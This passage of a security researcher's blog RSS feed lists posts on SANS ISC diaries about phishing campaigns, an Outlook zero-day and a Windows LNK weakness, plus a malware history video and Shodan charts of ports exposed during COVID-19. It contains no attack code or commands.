        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at how regional travel restrictions impact (or don&amp;rsquo;t) the number of IP addresses which expose remote access protocols to the internet.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Couple+of+interesting+Covid19+related+stats/26374/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at how regional travel restrictions impact (or don&amp;rsquo;t) the number of IP addresses which expose remote access protocols to the internet.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Covid-19</category>
            
          
            
              <category>Shodan</category>
            
          
            
              <category>SSH</category>
            
          
            
              <category>Telnet</category>
            
          
            
              <category>RDP</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Using Shell Links as zero-touch downloaders and to initiate network connections</title>
        <link>https://untrustednetwork.net/en/2020/06/24/sans-isc-diary-using-shell-links-as-zero-touch-downloaders-and-to-initiate-network-connections/</link>
        <pubDate>Wed, 24 Jun 2020 09:45:00 +0200</pubDate>
        
        <atom:modified>Wed, 24 Jun 2020 09:45:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/06/24/sans-isc-diary-using-shell-links-as-zero-touch-downloaders-and-to-initiate-network-connections/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at a weakness handling of LNK files in Windows, through which one may force the OS to download an arbitrary file from a remote server any time the shortcut file is displayed.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Using+Shell+Links+as+zerotouch+downloaders+and+to+initiate+network+connections/26276/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at a weakness handling of LNK files in Windows, through which one may force the OS to download an arbitrary file from a remote server any time the shortcut file is displayed.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>LNK</category>
            
          
            
              <category>Microsoft</category>
            
          
            
              <category>Windows</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS@MIC - Catch and Release: Phishing Techniques for the Good Guys</title>
        <link>https://untrustednetwork.net/en/2020/06/18/catch_and_release_video/</link>
        <pubDate>Thu, 18 Jun 2020 19:10:00 +0200</pubDate>
        
        <atom:modified>Thu, 18 Jun 2020 19:10:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/06/18/catch_and_release_video/</guid>
        <description>I did a SANS@MIC talk yesterday, in which I discussed interesting phishing techniques (mainly) from the point of view of red teamers. Since the recording was published today, if you didn&amp;rsquo;t get the chance to join us live, you may take a look at how it went on YouTube.
 </description>
        <content:encoded>&lt;p&gt;I did a SANS@MIC talk yesterday, in which I discussed interesting phishing techniques (mainly) from the point of view of red teamers. Since the recording was published today, if you didn&amp;rsquo;t get the chance to join us live, you may take a look at how it went on YouTube.&lt;/p&gt;
&lt;div style=&#34;width:560px; margin:0 auto;&#34;&gt;
    &lt;iframe width=&#34;560&#34; height=&#34;315&#34; src=&#34;https://www.youtube.com/embed/Fb2Z3bw-oJ8&#34; frameborder=&#34;0&#34; allow=&#34;accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture&#34; allowfullscreen&gt;&lt;/iframe&gt;
&lt;/div&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/icons/microphone.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>2020</category>
            
          
            
              <category>Talks</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Broken phishing accidentally exploiting Outlook zero-day</title>
        <link>https://untrustednetwork.net/en/2020/06/18/sans-isc-diary-broken-phishing-accidentally-exploiting-outlook-zero-day/</link>
        <pubDate>Thu, 18 Jun 2020 11:35:00 +0200</pubDate>
        
        <atom:modified>Thu, 18 Jun 2020 11:35:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/06/18/sans-isc-diary-broken-phishing-accidentally-exploiting-outlook-zero-day/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at a phishing, which accidentally exploited a 0-day vulnerability in Outlook, which allows for creation or modification of links when an e-mail is forwarded by Outlook.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Broken+phishing+accidentally+exploiting+Outlook+zeroday/26254/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at a phishing, which accidentally exploited a 0-day vulnerability in Outlook, which allows for creation or modification of links when an e-mail is forwarded by Outlook.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>0-day</category>
            
          
            
              <category>Outlook</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Update of overview of free online malware analysis sandboxes</title>
        <link>https://untrustednetwork.net/en/2020/05/30/online_sandboxes_v1.2/</link>
        <pubDate>Sat, 30 May 2020 13:30:00 +0200</pubDate>
        
        <atom:modified>Sat, 30 May 2020 13:30:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/05/30/online_sandboxes_v1.2/</guid>
        <description>Since there have been some small changes in the free online malware analysis sandbox landscape over the last couple of months, I&amp;rsquo;ve updated the comparison table to reflect them. You may find the new 1.2 version here.</description>
        <content:encoded>&lt;p&gt;Since there have been some small changes in the free online malware analysis sandbox landscape over the last couple of months, I&amp;rsquo;ve updated the &lt;a href=&#34;https://untrustednetwork.net/en/2020/03/12/overview-of-free-online-malware-analysis-sandboxes-2020-edition/&#34;&gt;comparison table&lt;/a&gt; to reflect them. You may find the new 1.2 version &lt;a href=&#34;https://www.untrustednetwork.net/en/sandboxes/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Malware</category>
            
          
            
              <category>Sandbox</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Frankenstein&#39;s phishing using Google Cloud Storage</title>
        <link>https://untrustednetwork.net/en/2020/05/27/sans-isc-diary-frankensteins-phishing-using-google-cloud-storage/</link>
        <pubDate>Wed, 27 May 2020 10:40:00 +0200</pubDate>
        
        <atom:modified>Wed, 27 May 2020 10:40:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/05/27/sans-isc-diary-frankensteins-phishing-using-google-cloud-storage/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at a strange phishing campaign, which was, due to combination of quite sophisticated and extremely amateurish components, reminiscent of the creation of Shelley&amp;rsquo;s Dr. Frankenstein.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Frankensteins+phishing+using+Google+Cloud+Storage/26174/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at a strange phishing campaign, which was, due to combination of quite sophisticated and extremely amateurish components, reminiscent of the creation of Shelley&amp;rsquo;s Dr. Frankenstein.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>SPF</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>History of Malware - Episode 1: Origins of Malware (1948 - 1979)</title>
        <link>https://untrustednetwork.net/en/2020/05/11/history-01/</link>
        <pubDate>Mon, 11 May 2020 09:35:00 +0200</pubDate>
        
        <atom:modified>Mon, 11 May 2020 09:35:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/05/11/history-01/</guid>
        <description>I decided to start a YouTube series on the History of Malware and the first video was published today.
In this episode we&amp;rsquo;ll take a look at where malware began. We&amp;rsquo;ll discuss the first theoretical works by John von Neumann, the origins of the terms &amp;lsquo;virus&amp;rsquo; and &amp;lsquo;worm&amp;rsquo; in relation to malware and the early experiments in distributed computation that gave birth to the first computer worms. If you&amp;rsquo;d like to learn more about the subjects, you may find links for the relevant sources under the video.</description>
        <content:encoded>&lt;p&gt;I decided to start a YouTube series on the History of Malware and the first video was published today.&lt;/p&gt;
&lt;p&gt;In this episode we&amp;rsquo;ll take a look at where malware began. We&amp;rsquo;ll discuss the first theoretical works by John von Neumann, the origins of the terms &amp;lsquo;virus&amp;rsquo; and &amp;lsquo;worm&amp;rsquo; in relation to malware and the early experiments in distributed computation that gave birth to the first computer worms. If you&amp;rsquo;d like to learn more about the subjects, you may find links for the relevant sources under the video.&lt;/p&gt;
&lt;div style=&#34;width:560px; margin:0 auto;&#34;&gt;
    &lt;iframe width=&#34;560&#34; height=&#34;315&#34; src=&#34;https://www.youtube.com/embed/GjY1KlmroOU&#34; frameborder=&#34;0&#34; allow=&#34;accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture&#34; allowfullscreen&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;p&gt;
John von Neumann - The General and Logical Theory of Automata&lt;br&gt;
&lt;a href=&#34;http://physics.bu.edu/~pankajm/PY571/HixonsymposiumVonNeumaan.pdf&#34;&gt;http://physics.bu.edu/~pankajm/PY571/HixonsymposiumVonNeumaan.pdf&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
John von Neumann - Theory of Self-Reproducing Automata&lt;br&gt;
&lt;a href=&#34;http://www.arise.mae.usp.br/wp-content/uploads/2018/03/Theory-of-self-reproducing-automata.pdf&#34;&gt;http://www.arise.mae.usp.br/wp-content/uploads/2018/03/Theory-of-self-reproducing-automata.pdf&lt;/a&gt;&lt;br&gt;
&lt;a href=&#34;https://archive.org/details/theoryofselfrepr00vonn_0/mode/2up&#34;&gt;https://archive.org/details/theoryofselfrepr00vonn_0/mode/2up&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;
&lt;p&gt;
Lionel Penrose - Self-Reproducing Machines&lt;br&gt;
&lt;a href=&#34;http://fab.cba.mit.edu/classes/865.18/replication/Penrose.pdf&#34;&gt;http://fab.cba.mit.edu/classes/865.18/replication/Penrose.pdf&lt;/a&gt;&lt;br&gt;
&lt;a href=&#34;https://wellcomelibrary.org/item/b20219222&#34;&gt;https://wellcomelibrary.org/item/b20219222&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
Frederick G. Stahl - 1960 – the first artificial universe complex artificial life in a Darwinian world&lt;br&gt;
&lt;a href=&#34;http://archive.computerhistory.org/resources/access/text/2017/02/102724826-05-01-acc.pdf&#34;&gt;http://archive.computerhistory.org/resources/access/text/2017/02/102724826-05-01-acc.pdf&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
M. D. McIlroy, R. Morris, V. A. Vyssotsky - Letter to C. A. Lang about Darwin&lt;br&gt;
&lt;a href=&#34;https://www.cs.dartmouth.edu/~doug/darwin.pdf&#34;&gt;https://www.cs.dartmouth.edu/~doug/darwin.pdf&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
The Jargon File 4.2.2&lt;br&gt;
&lt;a href=&#34;https://vanderworp.org/wp-content/uploads/2019/06/jargon.pdf&#34;&gt;https://vanderworp.org/wp-content/uploads/2019/06/jargon.pdf&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
Fork bombs - Wikia&lt;br&gt;
&lt;a href=&#34;https://malware.wikia.org/wiki/Fork_Bomb&#34;&gt;https://malware.wikia.org/wiki/Fork_Bomb&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
Numberphile - Does John Conway hate his Game of Life?&lt;br&gt;
&lt;a href=&#34;https://www.youtube.com/watch?v=E8kUJL04ELA&#34;&gt;https://www.youtube.com/watch?v=E8kUJL04ELA&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
Gregory Benford - The Scared Man&lt;br&gt;
&lt;a href=&#34;http://www.gregorybenford.com/extra/the-scarred-man-returns/&#34;&gt;http://www.gregorybenford.com/extra/the-scarred-man-returns/&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
Jordan Spencer Cunningham - Q&amp;A with Ray Tomlinson on Creeper “Virus”&lt;br&gt;
&lt;a href=&#34;https://nerdology.org/2014/11/qa-with-ray-tomlinson-on-creeper/&#34;&gt;https://nerdology.org/2014/11/qa-with-ray-tomlinson-on-creeper/&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
Veith Risak - Selbstreproduzierende Automaten mit minimaler Informationsübertragung&lt;br&gt;
&lt;a href=&#34;https://web.archive.org/web/20080305093506/http://www.cosy.sbg.ac.at/~risak/bilder/selbstrep.html&#34;&gt;https://web.archive.org/web/20080305093506/http://www.cosy.sbg.ac.at/~risak/bilder/selbstrep.html&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
Cicatrix - Interview with Q The Misanthrope&lt;br&gt;
&lt;a href=&#34;http://web.archive.org/web/20080406223546/http:/vx.netlux.org/lib/static/vdat/ivqmisan.htm&#34;&gt;http://web.archive.org/web/20080406223546/http:/vx.netlux.org/lib/static/vdat/ivqmisan.htm&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
Peter G. Neumann - The Risk Digest Volume 6 Issue 53&lt;br&gt;
&lt;a href=&#34;http://catless.ncl.ac.uk/Risks/6.53.html#subj4&#34;&gt;http://catless.ncl.ac.uk/Risks/6.53.html#subj4&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
John Walker - The Animal Episode&lt;br&gt;
&lt;a href=&#34;https://www.fourmilab.ch/documents/univac/animal.html&#34;&gt;https://www.fourmilab.ch/documents/univac/animal.html&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
PARC History&lt;br&gt;
&lt;a href=&#34;https://web.archive.org/web/20070711093550/http://www.parc.xerox.com/about/history/default.html&#34;&gt;https://web.archive.org/web/20070711093550/http://www.parc.xerox.com/about/history/default.html&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
John F. Shoch and Jon A. Hupp - The &#34;Worm&#34; Programs Early Experience with a Distributed Computation&lt;br&gt;
&lt;a href=&#34;http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.137.9511&amp;rep=rep1&amp;type=pdf&#34;&gt;http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.137.9511&amp;rep=rep1&amp;type=pdf&lt;/a&gt;
&lt;/p&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        
        
        
        
          
            
              <category>Malware</category>
            
          
            
              <category>Worm</category>
            
          
            
              <category>Virus</category>
            
          
            
              <category>Video</category>
            
          
        
        
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>History of Malware</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Agent Tesla delivered by the same phishing campaign for over a year</title>
        <link>https://untrustednetwork.net/en/2020/04/28/sans-isc-diary-agent-tesla-delivered-by-the-same-phishing-campaign-for-over-a-year/</link>
        <pubDate>Tue, 28 Apr 2020 08:45:00 +0200</pubDate>
        
        <atom:modified>Tue, 28 Apr 2020 08:45:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/04/28/sans-isc-diary-agent-tesla-delivered-by-the-same-phishing-campaign-for-over-a-year/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at a phishing campaign that has been running almost unchanged for more than a year and seems to be distributing exclusively Agent Tesla.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Agent+Tesla+delivered+by+the+same+phishing+campaign+for+over+a+year/26062/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at a phishing campaign that has been running almost unchanged for more than a year and seems to be distributing exclusively Agent Tesla.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
            
              <category>Malware</category>
            
          
            
              <category>Agent Tesla</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Look at the same phishing campaign 3 months apart</title>
        <link>https://untrustednetwork.net/en/2020/04/13/sans-isc-diary-look-at-the-same-phishing-campaign-3-months-apart/</link>
        <pubDate>Mon, 13 Apr 2020 11:35:00 +0200</pubDate>
        
        <atom:modified>Mon, 13 Apr 2020 11:35:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/04/13/sans-isc-diary-look-at-the-same-phishing-campaign-3-months-apart/</guid>
        <description>A Diary of mine was published today on the SANS Internet Storm Center. In this one, we take a look at two phishing e-mails from the same campaign sent out 3 months apart.</description>
        <content:encoded>&lt;p&gt;A &lt;a href=&#34;https://isc.sans.edu/forums/diary/Look+at+the+same+phishing+campaign+3+months+apart/26018/&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt;. In this one, we take a look at two phishing e-mails from the same campaign sent out 3 months apart.&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2020</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Open ports in the Time of Corona</title>
        <link>https://untrustednetwork.net/en/2020/04/02/open-ports-in-the-time-of-corona/</link>
        <pubDate>Thu, 02 Apr 2020 08:59:20 +0200</pubDate>
        
        <atom:modified>Thu, 02 Apr 2020 08:59:20 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2020/04/02/open-ports-in-the-time-of-corona/</guid>
        <description>One of the side effects of social distancing and self-quarantining due to COVID-19 was a large increase in the use of VPNs (and, in some cases, different remote access protocols, such as RDP or SSH) by companies around the world, so that their employees might work from home.
I was wondering how large this increase would be when compared to the usual state of affairs. To determine this, I took a look at data I gathered from Shodan over the course of March and made couple of - hopefully interesting - charts.</description>
        <content:encoded>&lt;p&gt;One of the side effects of social distancing and self-quarantining due to COVID-19 was a large increase in the use of VPNs (and, in some cases, different remote access protocols, such as RDP or SSH) by companies around the world, so that their employees might work from home.&lt;br /&gt;
I was wondering how large this increase would be when compared to the usual state of affairs. To determine this, I took a look at data I gathered from Shodan over the course of March and made couple of - hopefully interesting - charts.&lt;/p&gt;
&lt;p&gt;Before we get to them, however, I should mention that simply looking at absolute numbers gathered from Shodan wouldn&amp;rsquo;t give us much due to the way Shodan operates (for more details, take a look at &lt;a href=&#34;https://isc.sans.edu/diary/25506&#34;&gt;my diary about patching BlueKeep&lt;/a&gt;). Therefore, while Shodan saw a significant absolute increase in open ports/detected IPs in March (almost 12% rise in detected IP addresses globally), we will take a look at both absolute and the relative values - counts as well as percentages of all IPs globally/in a specific country, which have a certain port open.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re interested in how the situation looked before, I&amp;rsquo;ll add that Shodan itself recently released an article with analysis of some of the trends they saw from the start of July 2019 to the end of January 2020. You may find it &lt;a href=&#34;https://blog.shodan.io/trends-in-internet-exposure/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;One last thing I will mention before we get to &amp;ldquo;the good stuff&amp;rdquo; is that I didn&amp;rsquo;t include all the countries, for which I have data, in the charts, since that would make the post too large. If data for your country isn&amp;rsquo;t included in the charts and you would like to see how the situation changed where you live, &lt;a href=&#34;https://www.untrustednetwork.net/en/about/&#34;&gt;get in touch with me&lt;/a&gt; and if I have the data, I&amp;rsquo;ll try to add a chart for your country as well.&lt;/p&gt;
&lt;p&gt;Now, let&amp;rsquo;s take a look at the charts themselves. I picked the ports which have seen a high significant absolute increase globally - namely ports 22 (SSH), 80 (HTTP), 443 (HTTPS and many TLS-based services and VPN solutions) and 3389 (RDP). Unfortunatelly, I don&amp;rsquo;t have data for the usual VPN ports and related services (IKE, PPTP, etc.), but I assume that the jump in those was similarly significant as the one in TLS.&lt;/p&gt;
&lt;p&gt;Here is the list of countries for which charts are available:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#global&#34;&gt;Global data&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#australia&#34;&gt;Australia&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#canada&#34;&gt;Canada&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#cz&#34;&gt;Czech Republic&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#gb&#34;&gt;Great Britain&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#germany&#34;&gt;Germany&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#china&#34;&gt;China&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#italy&#34;&gt;Italy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#netherlands&#34;&gt;Netherlands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#romania&#34;&gt;Romania&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#russia&#34;&gt;Russia&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#slovakia&#34;&gt;Slovakia&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#spain&#34;&gt;Spain&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#usa&#34;&gt;USA&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&#34;global&#34;&gt;Global situation&lt;/h2&gt;
&lt;p&gt;In addition to the ports mentioned above, on a global level we will take a look at SMB as well. There has been a signifficant increase in SMB open to the internet and, unfortunatelly, that was true even for SMBv1 on Windows.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/global-ssh.png&#34; alt=&#34;Global situation - SSH&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/global-http.png&#34; alt=&#34;Global situation - HTTP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/global-https.png&#34; alt=&#34;Global situation - HTTPS&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/global-smb.png&#34; alt=&#34;Global situation - SMB&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/global-rdp.png&#34; alt=&#34;Global situation - RDP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;As we may see, although there was a significant absolute increase in IPs which offer the protocols and services we were interested in, the percentage of IPs offering these protocols actually went down in cases of SSH and RDP. As the following charts demonstrate, this trend held for some countries as well, but not all of them.&lt;/p&gt;
&lt;h2 id=&#34;australia&#34;&gt;Australia&lt;/h2&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/australia-ssh.png&#34; alt=&#34;Australia - SSH&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/australia-http.png&#34; alt=&#34;Australia - HTTP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/australia-https.png&#34; alt=&#34;Australia - HTTPS&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/australia-rdp.png&#34; alt=&#34;Australia - RDP&#34; /&gt;&lt;/p&gt;
&lt;h2 id=&#34;canada&#34;&gt;Canada&lt;/h2&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/canada-ssh.png&#34; alt=&#34;Canada - SSH&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/canada-http.png&#34; alt=&#34;Canada - HTTP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/canada-https.png&#34; alt=&#34;Canada - HTTPS&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/canada-rdp.png&#34; alt=&#34;Canada - RDP&#34; /&gt;&lt;/p&gt;
&lt;h2 id=&#34;cz&#34;&gt;Czech Republic&lt;/h2&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/cz-ssh.png&#34; alt=&#34;Czech Republic - SSH&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/cz-http.png&#34; alt=&#34;Czech Republic - HTTP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/cz-https.png&#34; alt=&#34;Czech Republic - HTTPS&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/cz-rdp.png&#34; alt=&#34;Czech Republic - RDP&#34; /&gt;&lt;/p&gt;
&lt;h2 id=&#34;gb&#34;&gt;Great Britain&lt;/h2&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/gb-ssh.png&#34; alt=&#34;Great Britain - SSH&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/gb-http.png&#34; alt=&#34;Great Britain - HTTP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/gb-https.png&#34; alt=&#34;Great Britain - HTTPS&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/gb-rdp.png&#34; alt=&#34;Great Britain - RDP&#34; /&gt;&lt;/p&gt;
&lt;h2 id=&#34;germany&#34;&gt;Germany&lt;/h2&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/germany-ssh.png&#34; alt=&#34;Germany - SSH&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/germany-http.png&#34; alt=&#34;Germany - HTTP&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/germany-https.png&#34; alt=&#34;Germany - HTTPS&#34; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://untrustednetwork.net/images/2020/06-corona_ports/germany-rdp.png&#34; alt=&#34;Germany - RDP&#34; /&gt;&lt;/p&gt;
